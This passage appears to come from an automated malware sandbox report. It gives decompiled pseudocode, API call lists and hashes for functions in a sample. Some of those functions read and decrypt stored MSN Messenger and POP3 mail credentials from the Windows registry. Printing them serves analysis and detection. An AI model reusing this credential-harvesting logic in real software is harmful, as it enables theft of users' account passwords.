									_t115 =  *((intOrPtr*)(_v20 + _t94));
								}
								if(_t115 == _t117) {
									goto L28;
								}
								_t94 = _t94 + 1;
								if(_t94 < _v8) {
									goto L21;
								} else {
									goto L27;
								}
							}
							L28:
							_t104 = 0;
							if(_t94 < 0) {
								E004045E8( &_v20, _v64);
								_t98 = abs( *((char*)(_t120 + _t118)) -  *((char*)(_t120 + _t118 - 1)));
								_pop(_t106);
								if(_t98 != 1) {
									_t47 = _t98 - 2; // -2
									_t106 = _t47;
									if(_t106 > 3) {
										if(_t98 < 6) {
											if(_t98 > 0xa) {
												goto L40;
											}
										} else {
											if(_t98 > 0xa) {
												goto L40;
											} else {
												_t159 = _v28 +  *0x414510;
											}
											goto L41;
										}
									} else {
										_t159 = _v28 +  *0x414518;
										goto L41;
									}
								} else {
									_t165 = _v28;
									goto L30;
								}
							} else {
								_t100 = abs(_t117 -  *((char*)(_t120 + _t118 - 1)));
								_t165 = _v28;
								_pop(_t106);
								if(_t100 != 0) {
									_t159 = _t165 +  *0x414520;
								} else {
									L30:
									_t159 = _t165 +  *0x414528;
								}
								goto L41;
							}
						} else {
							E004045E8( &_v20, _v64);
							L40:
							_t159 = _v28 +  *0x414508;
							L41:
							_v28 = _t159;
						}
						_t120 = _t120 + 1;
					} while (_t120 < _v36);
				}
				_v64 = _t104;
				_t80 = 0x1a;
				if(_v56 != _t104) {
					_v64 = _t80;
				}
				if(_v52 != _t104) {
					_v64 = _v64 + _t80;
				}
				if(_v48 != _t104) {
					_v64 = _v64 + 0xa;
				}
				if(_v44 != _t104) {
					_v64 = _v64 + 0x10;
				}
				if(_v60 != _t104) {
					_v64 = _v64 + 0x11;
				}
				if(_v40 != _t104) {
					_v64 = _v64 + 0x1e;
				}
				if(_v64 <= _t104) {
					if(_v20 != _t104) {
						free(_v20);
					}
					_t81 = 0;
				} else {
					asm("fild dword [esp+0xc]");
					_push(_t106);
					_push(_t106);
					 *_t125 = _t159;
					L004115B8();
					_v36 = _t159;
					 *_t125 =  *0x414500;
					L004115B8();
					asm("fdivr qword [esp+0x30]");
					asm("fistp qword [esp+0x30]");
					_t122 = _v28;
					if(_v20 != _t104) {
						free(_v20);
					}
					_t81 = _t122;
				}
				return _t81;
			}


































                                                                                              0x00401a50
                                                                                              0x00401a50
                                                                                              0x00401a56
                                                                                              0x00401a5c
                                                                                              0x00401a61
                                                                                              0x00401a63
                                                                                              0x00401a65
                                                                                              0x00401a69
                                                                                              0x00401a6d
                                                                                              0x00401a6e
                                                                                              0x00401a72
                                                                                              0x00401a76
                                                                                              0x00401a7a
                                                                                              0x00401a7e
                                                                                              0x00401a82
                                                                                              0x00401a86
                                                                                              0x00401a8a
                                                                                              0x00401a92
                                                                                              0x00401a96
                                                                                              0x00401a9a
                                                                                              0x00401a9e
                                                                                              0x00401aa4
                                                                                              0x00401aa4
                                                                                              0x00401aad
                                                                                              0x00401ab1
                                                                                              0x00401ab3
                                                                                              0x00401ab3
                                                                                              0x00401abd
                                                                                              0x00401abf
                                                                                              0x00401abf
                                                                                              0x00401ac9
                                                                                              0x00401acb
                                                                                              0x00401acb
                                                                                              0x00401ad5
                                                                                              0x00401ad7
                                                                                              0x00401ad7
                                                                                              0x00401ae1
                                                                                              0x00401ae3
                                                                                              0x00401ae3
                                                                                              0x00401aed
                                                                                              0x00401aef
                                                                                              0x00401aef
                                                                                              0x00401af6
                                                                                              0x00401b01
                                                                                              0x00401b04
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00401af8
                                                                                              0x00401afb
                                                                                              0x00401b06
                                                                                              0x00401b06
                                                                                              0x00401afd
                                                                                              0x00401afd
                                                                                              0x00000000
                                                                                              0x00401afd
                                                                                              0x00401afb
                                                                                              0x00401b0c
                                                                                              0x00401b20
                                                                                              0x00401b26
                                                                                              0x00401b48
                                                                                              0x00401b48
                                                                                              0x00401b28
                                                                                              0x00000000
                                                                                              0x00401b28
                                                                                              0x00401b2a
                                                                                              0x00401b3b
                                                                                              0x00401b32
                                                                                              0x00401b36
                                                                                              0x00401b36
                                                                                              0x00401b3f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00401b41
                                                                                              0x00401b46
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00401b46
                                                                                              0x00401b4b
                                                                                              0x00401b4b
                                                                                              0x00401b4f
                                                                                              0x00401b82
                                                                                              0x00401b93
                                                                                              0x00401b9b
                                                                                              0x00401b9c
                                                                                              0x00401ba4
                                                                                              0x00401ba4
                                                                                              0x00401baa
                                                                                              0x00401bbb
                                                                                              0x00401bd1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00401bbd
                                                                                              0x00401bc0
                                                                                              0x00000000
                                                                                              0x00401bc2
                                                                                              0x00401bc6
                                                                                              0x00401bc6
                                                                                              0x00000000
                                                                                              0x00401bc0
                                                                                              0x00401bac
                                                                                              0x00401bb0
                                                                                              0x00000000
                                                                                              0x00401bb0
                                                                                              0x00401b9e
                                                                                              0x00401b9e
                                                                                              0x00000000
                                                                                              0x00401b9e
                                                                                              0x00401b51
                                                                                              0x00401b5c
                                                                                              0x00401b63
                                                                                              0x00401b67
                                                                                              0x00401b68
                                                                                              0x00401b72
                                                                                              0x00401b6a
                                                                                              0x00401b6a
                                                                                              0x00401b6a
                                                                                              0x00401b6a
                                                                                              0x00000000
                                                                                              0x00401b68
                                                                                              0x00401b0e
                                                                                              0x00401b16
                                                                                              0x00401bd3
                                                                                              0x00401bd7
                                                                                              0x00401bdd
                                                                                              0x00401bdd
                                                                                              0x00401bdd
                                                                                              0x00401be1
                                                                                              0x00401be2
                                                                                              0x00401aa4
                                                                                              0x00401bf2
                                                                                              0x00401bf6
                                                                                              0x00401bf7
                                                                                              0x00401bf9
                                                                                              0x00401bf9
                                                                                              0x00401c01
                                                                                              0x00401c03
                                                                                              0x00401c03
                                                                                              0x00401c0b
                                                                                              0x00401c0d
                                                                                              0x00401c0d
                                                                                              0x00401c16
                                                                                              0x00401c18
                                                                                              0x00401c18
                                                                                              0x00401c21
                                                                                              0x00401c23
                                                                                              0x00401c23
                                                                                              0x00401c2c
                                                                                              0x00401c2e
                                                                                              0x00401c2e
                                                                                              0x00401c37
                                                                                              0x00401c83
                                                                                              0x00401c89
                                                                                              0x00401c8e
                                                                                              0x00401c8f
                                                                                              0x00401c39
                                                                                              0x00401c39
                                                                                              0x00401c3d
                                                                                              0x00401c3e
                                                                                              0x00401c3f
                                                                                              0x00401c42
                                                                                              0x00401c47
                                                                                              0x00401c51
                                                                                              0x00401c54
                                                                                              0x00401c5d
                                                                                              0x00401c67
                                                                                              0x00401c6b
                                                                                              0x00401c6f
                                                                                              0x00401c75
                                                                                              0x00401c7a
                                                                                              0x00401c7b
                                                                                              0x00401c7b
                                                                                              0x00401c96

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: free$strlen
                                                                                              • String ID:
                                                                                              • API String ID: 667451143-3916222277
                                                                                              • Opcode ID: 37bb09f8b96ce6c60aa0d5a3bd89c5871ef181f1a1b83bd216632f6d31a5aab6
                                                                                              • Instruction ID: 06eee62d74eb4b55ebb23f84067d794473d6c8b6021198aa51b9bcc42ccbae70
                                                                                              • Opcode Fuzzy Hash: 37bb09f8b96ce6c60aa0d5a3bd89c5871ef181f1a1b83bd216632f6d31a5aab6
                                                                                              • Instruction Fuzzy Hash: DA6178704083859FDB249F26948046BBBF1FB85315F54997FF5D2A22A1E738E8468B0B
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040D4A6, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 94registryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040D4A6(char* __ebx, void** _a4) {
				int _v8;
				int _v12;
				int _v16;
				void* _v20;
				int _v24;
				char* _v28;
				char _v32;
				char _v556;
				char _v557;
				char _v1578;
				void _v1580;
				void* __edi;
				void* __esi;
				long _t39;
				int _t43;
				char _t48;
				char* _t63;
				int* _t67;

				_t63 = __ebx;
				_t67 = 0;
				_v16 = 0;
				_v12 = 0x400;
				_t39 = RegQueryValueExA( *_a4, "Password.NET Messenger Service", 0, 0,  &_v1580,  &_v12);
				if(_t39 != 0) {
					L13:
					RegCloseKey( *_a4);
					return _v16;
				}
				_t43 = _t39 + 1;
				if(_v12 <= _t43) {
					goto L13;
				}
				_t74 = _v1580 - 0x20;
				_v8 = 0;
				if(_v1580 >= 0x20) {
					_v8 = _t43;
					L10:
					if(_v8 != _t67) {
						_v557 = 0;
						E00401380( &_v1580,  &(_t63[0x100]), 0xff);
						_v8 = 0xff;
						_t48 = RegQueryValueExA( *_a4, "User.NET Messenger Service", 0, 0, _t63,  &_v8);
						if(_t48 == 0) {
							_t63[0xfe] = _t48;
							_t63[0x1fe] = _t48;
							_v16 = 1;
						}
					}
					goto L13;
				}
				_t69 =  &_v556;
				E004046D7( &_v556);
				if(E004047A0(_t69, _t74) == 0) {
					L8:
					E004047F1( &_v556);
					_t67 = 0;
					goto L10;
				}
				_v32 = _v12 + 0xfffffffe;
				_v28 =  &_v1578;
				if(E00404811(_t69,  &_v32, 0,  &_v24) == 0) {
					goto L8;
				}
				if(_v24 < 0x400) {
					memcpy( &_v1580, _v20, _v24);
					_v8 = 1;
				}
				LocalFree(_v20);
				goto L8;
			}





















                                                                                              0x0040d4a6
                                                                                              0x0040d4bf
                                                                                              0x0040d4cf
                                                                                              0x0040d4d2
                                                                                              0x0040d4d5
                                                                                              0x0040d4dd
                                                                                              0x0040d5c7
                                                                                              0x0040d5cc
                                                                                              0x0040d5d8
                                                                                              0x0040d5d8
                                                                                              0x0040d4e3
                                                                                              0x0040d4e7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040d4ed
                                                                                              0x0040d4f4
                                                                                              0x0040d4f7
                                                                                              0x0040d56d
                                                                                              0x0040d570
                                                                                              0x0040d573
                                                                                              0x0040d587
                                                                                              0x0040d58e
                                                                                              0x0040d5a7
                                                                                              0x0040d5aa
                                                                                              0x0040d5b2
                                                                                              0x0040d5b4
                                                                                              0x0040d5ba
                                                                                              0x0040d5c0
                                                                                              0x0040d5c0
                                                                                              0x0040d5b2
                                                                                              0x00000000
                                                                                              0x0040d573
                                                                                              0x0040d4f9
                                                                                              0x0040d4ff
                                                                                              0x0040d50b
                                                                                              0x0040d55e
                                                                                              0x0040d564
                                                                                              0x0040d569
                                                                                              0x00000000
                                                                                              0x0040d569
                                                                                              0x0040d513
                                                                                              0x0040d51c
                                                                                              0x0040d532
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040d537
                                                                                              0x0040d546
                                                                                              0x0040d54e
                                                                                              0x0040d54e
                                                                                              0x0040d558
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • RegQueryValueExA.ADVAPI32(?,Password.NET Messenger Service,00000000,00000000,?,?,80000001,7554F420), ref: 0040D4D5
                                                                                              • RegQueryValueExA.ADVAPI32(?,User.NET Messenger Service,00000000,00000000,?,?), ref: 0040D5AA
                                                                                                • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                                                • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,7554F420), ref: 004047A8
                                                                                                • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                                              • memcpy.MSVCRT ref: 0040D546
                                                                                              • LocalFree.KERNEL32(?,?,00000000,?), ref: 0040D558
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0040D5CC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: QueryValue$AddressCloseFreeLibraryLoadLocalProcmemcpystrcpy
                                                                                              • String ID: $Password.NET Messenger Service$User.NET Messenger Service
                                                                                              • API String ID: 3289975857-105384665
                                                                                              • Opcode ID: d83e2ebe096d5bcd78dc6c5e473717e98c5fc49575dad68c24a229f0531786f0
                                                                                              • Instruction ID: 7f1cec63b8765f81c3836bbc11e71f1516ceea0880c28a2d93855dc55ce36bd3
                                                                                              • Opcode Fuzzy Hash: d83e2ebe096d5bcd78dc6c5e473717e98c5fc49575dad68c24a229f0531786f0
                                                                                              • Instruction Fuzzy Hash: AE314DB1D01219AFDB11DF94CC44BDEBBB9AF48318F1040B6E905B7290D6789B94CF99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040706C, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 90COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 89%
                                                                                              			E0040706C(void* __ecx, intOrPtr* _a4, intOrPtr _a8, char _a12) {
				char _v12;
				short* _v16;
				char _v20;
				char* _v24;
				char _v28;
				char _v288;
				char _v544;
				char _v800;
				char _v1056;
				char _v1584;
				void _v2607;
				char _v2608;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t36;
				void* _t63;
				char* _t66;
				void* _t68;

				_t63 = __ecx;
				_v2608 = 0;
				memset( &_v2607, 0, 0x3ff);
				_v12 = 0x400;
				_v1056 = 0;
				_v800 = 0;
				_v544 = 0;
				_v288 = 0;
				_t36 = E0040EBA3(_t63, _a8, "POP3_credentials",  &_v2608,  &_v12);
				_t72 = _t36;
				if(_t36 != 0) {
					return _t36;
				}
				_t67 =  &_v1584;
				E004046D7( &_v1584);
				if(E004047A0( &_v1584, _t72) != 0) {
					_v24 =  &_v2608;
					_v28 = _v12;
					_t16 =  &_v20; // 0x407221
					if(E00404811(_t67,  &_v28, 0, _t16) != 0) {
						_t19 =  &_v20; // 0x407221
						 *((char*)(_t68 + WideCharToMultiByte(0, 0, _v16,  *_t19 >> 1,  &_v544, 0xfd, 0, 0) - 0x21c)) = 0;
						LocalFree(_v16);
						E0040EB80(0xff, _t63, _a8, "POP3_name",  &_v800);
						E0040EB80(0xff, _t63, _a8, "POP3_host",  &_v288);
						_t28 =  &_a12; // 0x407221
						_t66 =  &_v1056;
						E004060D0(0xff, _t66,  *_t28);
						 *((intOrPtr*)( *_a4))(_t66);
					}
				}
				return E004047F1( &_v1584);
			}






















                                                                                              0x0040706c
                                                                                              0x00407087
                                                                                              0x0040708d
                                                                                              0x004070a5
                                                                                              0x004070ac
                                                                                              0x004070b2
                                                                                              0x004070b8
                                                                                              0x004070be
                                                                                              0x004070c4
                                                                                              0x004070cc
                                                                                              0x004070ce
                                                                                              0x00407199
                                                                                              0x00407199
                                                                                              0x004070d4
                                                                                              0x004070da
                                                                                              0x004070e6
                                                                                              0x004070f2
                                                                                              0x004070f8
                                                                                              0x004070fb
                                                                                              0x0040710d
                                                                                              0x0040711d
                                                                                              0x00407131
                                                                                              0x00407138
                                                                                              0x00407154
                                                                                              0x0040716a
                                                                                              0x0040716f
                                                                                              0x00407172
                                                                                              0x00407178
                                                                                              0x00407188
                                                                                              0x00407188
                                                                                              0x0040710d
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040708D
                                                                                                • Part of subcall function 0040EBA3: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,004024A0,?), ref: 0040EBB9
                                                                                                • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                                                • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,7554F420), ref: 004047A8
                                                                                                • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,!r@,?,000000FD,00000000,00000000,?,00000000,!r@,?,?,?,?,00000000), ref: 00407128
                                                                                              • LocalFree.KERNEL32(?,?,?,?,?,00000000,7554ED80,?), ref: 00407138
                                                                                                • Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B
                                                                                                • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
                                                                                                • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWidememcpymemsetstrcpystrlen
                                                                                              • String ID: !r@$!r@$POP3_credentials$POP3_host$POP3_name
                                                                                              • API String ID: 604216836-250559020
                                                                                              • Opcode ID: 88d4546f94300e18eb63e1a28018ddb3fc5fe9f294d301ab42fb72424ac45106
                                                                                              • Instruction ID: f8ca724a3b3a12fba31c48434a973b8369f3aae8d57bdfed2f45406e53e98f37
                                                                                              • Opcode Fuzzy Hash: 88d4546f94300e18eb63e1a28018ddb3fc5fe9f294d301ab42fb72424ac45106
                                                                                              • Instruction Fuzzy Hash: C331707194021CAFDB11EB698C81ADE7BBCEF19344F0084B6FA05A2281D6389B598F65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405E46, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52stringlibrarywindowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 68%
                                                                                              			E00405E46(long __edi, char* _a4) {
				char _v8;
				void* _t8;
				void* _t10;
				long _t14;
				long _t24;

				_t24 = __edi;
				_t1 = _t24 - 0x834; // -2100
				_t8 = 0;
				_t14 = 0x1100;
				if(_t1 <= 0x383) {
					_t8 = LoadLibraryExA("netmsg.dll", 0, 2);
					if(0 != 0) {
						_t14 = 0x1900;
					}
				}
				if(FormatMessageA(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
					_t10 = strcpy(_a4, "Unknown Error");
				} else {
					if(strlen(_v8) < 0x400) {
						strcpy(_a4, _v8);
					}
					_t10 = LocalFree(_v8);
				}
				return _t10;
			}








                                                                                              0x00405e46
                                                                                              0x00405e4c
                                                                                              0x00405e54
                                                                                              0x00405e5c
                                                                                              0x00405e61
                                                                                              0x00405e6b
                                                                                              0x00405e73
                                                                                              0x00405e75
                                                                                              0x00405e75
                                                                                              0x00405e73
                                                                                              0x00405e91
                                                                                              0x00405ec0
                                                                                              0x00405e93
                                                                                              0x00405e9e
                                                                                              0x00405ea6
                                                                                              0x00405eac
                                                                                              0x00405eb0
                                                                                              0x00405eb0
                                                                                              0x00405eca

                                                                                              APIs
                                                                                              • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00405F65,?,?), ref: 00405E6B
                                                                                              • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,?,00000000,?,?,00405F65,?,?), ref: 00405E89
                                                                                              • strlen.MSVCRT ref: 00405E96
                                                                                              • strcpy.MSVCRT(?,?,?,?,00405F65,?,?), ref: 00405EA6
                                                                                              • LocalFree.KERNEL32(?,?,?,00405F65,?,?), ref: 00405EB0
                                                                                              • strcpy.MSVCRT(?,Unknown Error,?,?,00405F65,?,?), ref: 00405EC0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: strcpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                                                              • String ID: Unknown Error$netmsg.dll
                                                                                              • API String ID: 3198317522-572158859
                                                                                              • Opcode ID: be691a346cef5d5e24c515aac1ca35402bb88184c6041fe02f13b1b1e364655c
                                                                                              • Instruction ID: 3a45a8761f4bc18c8cc8ce1e33cdf84813ecacbbbbff7bb38409c5e389e3efd7
                                                                                              • Opcode Fuzzy Hash: be691a346cef5d5e24c515aac1ca35402bb88184c6041fe02f13b1b1e364655c
                                                                                              • Instruction Fuzzy Hash: A901B131604118BAE7155B61ED46EDF7E6DDB14792B20443AF602F00A0DA785F409A98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040875C, Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 157COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 92%
                                                                                              			E0040875C(void* __eax, void* __eflags, signed int _a4, short _a8) {
				char _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t96;
				signed int _t98;
				void* _t99;
				signed int _t104;
				signed short _t107;
				signed int _t110;
				intOrPtr _t114;
				signed int _t117;
				signed int _t119;
				signed short _t121;
				signed int _t122;
				signed int _t152;
				signed int _t156;
				signed int _t158;
				signed int _t161;
				signed int _t163;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				void* _t172;
				void* _t173;
				void* _t174;
				void* _t178;
				intOrPtr _t180;

				_t174 = __eflags;
				_t172 = __eax;
				E00408572(__eax);
				 *(_t172 + 0x2c) =  *(_t172 + 0x2c) & 0x00000000;
				_t122 = 0xd;
				 *((intOrPtr*)(_t172 + 0x184)) = _a4;
				_t156 = 0x14;
				_t96 = _t122 * _t156;
				 *(_t172 + 0x1b0) = _t122;
				_push( ~(0 | _t174 > 0x00000000) | _t96);
				L004115D0();
				 *(_t172 + 0x1b4) = _t96;
				_t158 = 0x10;
				_t98 = _t122 * _t158;
				_push( ~(0 | _t174 > 0x00000000) | _t98);
				L004115D0();
				 *(_t172 + 0x34) = _t98;
				_v8 = 0x4168e0;
				do {
					_t21 =  &_v8; // 0x4168e0
					_t99 =  *_t21;
					_t168 =  *_t99;
					_v12 = _t168;
					_t169 = _t168 * 0x14;
					memcpy( *(_t172 + 0x1b4) + _t169, _t99, 0x14);
					_t24 =  &_v8; // 0x4168e0
					_t104 = _v12 << 4;
					_v12 = _t104;
					memcpy( *(_t172 + 0x34) + _t104,  *_t24 + 0x14, 0x10);
					_t107 =  *(_t169 +  *(_t172 + 0x1b4) + 0x10);
					_t173 = _t173 + 0x18;
					_v16 = _t107;
					 *((intOrPtr*)( *(_t172 + 0x34) + _v12 + 0xc)) = _t107;
					if((_t107 & 0xffff0000) == 0) {
						 *(_t169 +  *(_t172 + 0x1b4) + 0x10) = E004078FF(_t107 & 0x0000ffff);
						_t121 = E004078FF(_v16 | 0x00010000);
						 *( *(_t172 + 0x34) + _v12 + 0xc) = _t121;
						_t122 = 0xd;
					}
					_v8 = _v8 + 0x24;
					_t178 = _v8 - 0x416ab4;
				} while (_t178 < 0);
				 *(_t172 + 0x38) =  *(_t172 + 0x38) & 0x00000000;
				 *((intOrPtr*)(_t172 + 0x3c)) = _a8;
				_t161 = 4;
				_t110 = _t122 * _t161;
				 *(_t172 + 0x20) = _t122;
				 *((intOrPtr*)(_t172 + 0x1c)) = 0x20;
				_push( ~(0 | _t178 > 0x00000000) | _t110);
				L004115D0();
				_push(0xc);
				 *(_t172 + 0x24) = _t110;
				L004115D0();
				_t170 = _t110;
				if(_t170 == 0) {
					_t170 = 0;
					__eflags = 0;
				} else {
					_t114 =  *((intOrPtr*)(_t172 + 0x48));
					_t180 = _t114;
					_a8 = _t114;
					if(_t180 == 0) {
						_a8 = 0x64;
					}
					 *((intOrPtr*)(_t170 + 8)) = _a4;
					_t163 = 4;
					_t117 = _t122 * _t163;
					 *(_t170 + 4) = _t122;
					_push( ~(0 | _t180 > 0x00000000) | _t117);
					L004115D0();
					_a4 = _a4 & 0x00000000;
					 *_t170 = _t117;
					do {
						_t152 = _a4;
						_t119 = _t152 << 2;
						_a4 = _a4 + 1;
						 *( *_t170 + _t119 + 2) = _t152;
						 *((short*)(_t119 +  *_t170)) = _a8;
					} while (_a4 < _t122);
				}
				 *(_t172 + 0x19c) =  *(_t172 + 0x19c) & 0x00000000;
				 *(_t172 + 0x1a0) = _t170;
				 *((intOrPtr*)(_t172 + 0x40)) = 1;
				 *((intOrPtr*)(_t172 + 0x198)) = 1;
				 *((intOrPtr*)(_t172 + 0x1a4)) = 1;
				 *((intOrPtr*)(_t172 + 0x1a8)) = 1;
				 *((intOrPtr*)(_t172 + 0x1c4)) = 0x32;
				return E004086DC(_t172);
			}

































                                                                                              0x0040875c
                                                                                              0x00408765
                                                                                              0x00408767
                                                                                              0x0040876f
                                                                                              0x00408775
                                                                                              0x00408776
                                                                                              0x00408780
                                                                                              0x00408783
                                                                                              0x00408788
                                                                                              0x00408792
                                                                                              0x00408793
                                                                                              0x00408798
                                                                                              0x004087a2
                                                                                              0x004087a5
                                                                                              0x004087ae
                                                                                              0x004087af
                                                                                              0x004087b6
                                                                                              0x004087b9
                                                                                              0x004087c0
                                                                                              0x004087c0
                                                                                              0x004087c0
                                                                                              0x004087c3
                                                                                              0x004087c5
                                                                                              0x004087c8
                                                                                              0x004087d7
                                                                                              0x004087dc
                                                                                              0x004087eb
                                                                                              0x004087f1
                                                                                              0x004087f4
                                                                                              0x004087ff
                                                                                              0x00408809
                                                                                              0x00408811
                                                                                              0x00408814
                                                                                              0x00408818
                                                                                              0x00408831
                                                                                              0x00408835
                                                                                              0x00408842
                                                                                              0x00408846
                                                                                              0x00408846
                                                                                              0x00408847
                                                                                              0x0040884b
                                                                                              0x0040884b
                                                                                              0x0040885b
                                                                                              0x0040885f
                                                                                              0x00408866
                                                                                              0x00408869
                                                                                              0x0040886e
                                                                                              0x00408871
                                                                                              0x0040887c
                                                                                              0x0040887d
                                                                                              0x00408882
                                                                                              0x00408884
                                                                                              0x00408887
                                                                                              0x0040888c
                                                                                              0x00408892
                                                                                              0x004088ee
                                                                                              0x004088ee
                                                                                              0x00408894
                                                                                              0x00408894
                                                                                              0x00408897
                                                                                              0x00408899
                                                                                              0x0040889c
                                                                                              0x0040889e
                                                                                              0x0040889e
                                                                                              0x004088a8
                                                                                              0x004088af
                                                                                              0x004088b2
                                                                                              0x004088b7
                                                                                              0x004088be
                                                                                              0x004088bf
                                                                                              0x004088c4
                                                                                              0x004088c9
                                                                                              0x004088cb
                                                                                              0x004088cb
                                                                                              0x004088d2
                                                                                              0x004088d5
                                                                                              0x004088db
                                                                                              0x004088e6
                                                                                              0x004088e6
                                                                                              0x004088ec
                                                                                              0x004088f0
                                                                                              0x004088fa
                                                                                              0x00408902
                                                                                              0x00408905
                                                                                              0x0040890b
                                                                                              0x00408911
                                                                                              0x00408917
                                                                                              0x0040892a

                                                                                              APIs
                                                                                                • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040857E
                                                                                                • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040858C
                                                                                                • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040859D
                                                                                                • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085B4
                                                                                                • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085BD
                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 00408793
                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 004087AF
                                                                                              • memcpy.MSVCRT ref: 004087D7
                                                                                              • memcpy.MSVCRT ref: 004087F4
                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040887D
                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 00408887
                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 004088BF
                                                                                                • Part of subcall function 004078FF: LoadStringA.USER32 ref: 004079C8
                                                                                                • Part of subcall function 004078FF: memcpy.MSVCRT ref: 00407A07
                                                                                                • Part of subcall function 004078FF: strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,75144DE0), ref: 0040797A
                                                                                                • Part of subcall function 004078FF: strlen.MSVCRT ref: 00407998
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ??2@??3@$memcpy$LoadStringstrcpystrlen
                                                                                              • String ID: d$hA
                                                                                              • API String ID: 3781940870-4030989184
                                                                                              • Opcode ID: 6c64bdb5196202114d018d6502db394b3a43eca9dd46e983fc9d5c63418de248
                                                                                              • Instruction ID: 2ee817cab8fb9d662dc1fdc17dcda2a390100e1008d8253a008a3d74f0a2914d
                                                                                              • Opcode Fuzzy Hash: 6c64bdb5196202114d018d6502db394b3a43eca9dd46e983fc9d5c63418de248
                                                                                              • Instruction Fuzzy Hash: 76518D72A01704AFDB24DF2AC582B9AB7E5FF48354F10852EE54ADB391EB74E940CB44
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040314D, Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 67%
                                                                                              			E0040314D(void* __eax, intOrPtr _a4, char* _a8) {
				signed int _v8;
				intOrPtr _v12;
				char _v188;
				char _v268;
				char _v524;
				void* __ebx;
				void* __edi;
